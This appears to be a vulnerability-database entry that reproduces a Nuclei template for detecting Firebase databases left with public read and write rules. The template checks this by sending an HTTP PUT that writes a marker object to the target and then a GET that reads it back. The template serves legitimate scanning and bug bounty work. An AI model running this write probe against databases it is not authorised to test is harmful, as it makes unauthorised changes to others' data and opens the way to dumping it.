insecure-firebase-database: Insecure Firebase Database

日期: 2025-08-01 | 影响软件: FIREBASE DATABASE | POC: 已公开

漏洞描述

If the owner of the app have set the security rules as true for both "read" & "write" an attacker can probably dump database and write his own data to firebase database.

PoC代码[已公开]

id: insecure-firebase-database

info:
  name: Insecure Firebase Database
  author: rafaelwdornelas
  severity: high
  description: If the owner of the app have set the security rules as true for both "read" & "write" an attacker can probably dump database and write his own data to firebase database.
  reference:
    - https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty
  metadata:
    verified: true
    max-request: 2
  tags: firebase,google,misconfig,intrusive,vuln

http:
  - raw:
      - |
        PUT /{{randstr}}.json HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"id":"insecure-firebase-database"}
      - |
        GET /{{randstr}}.json HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{"id":"insecure-firebase-database"}'

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d5bde23dfa0675773730f2d04d376a36dcf0566b9d18b4b9313ac86986b120ca022008dc50d3790557a1d7c4b28f3ada87bfd183c34ff92aff20dedfd3a49793549a:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/misconfiguration/google/insecure-firebase-database.yaml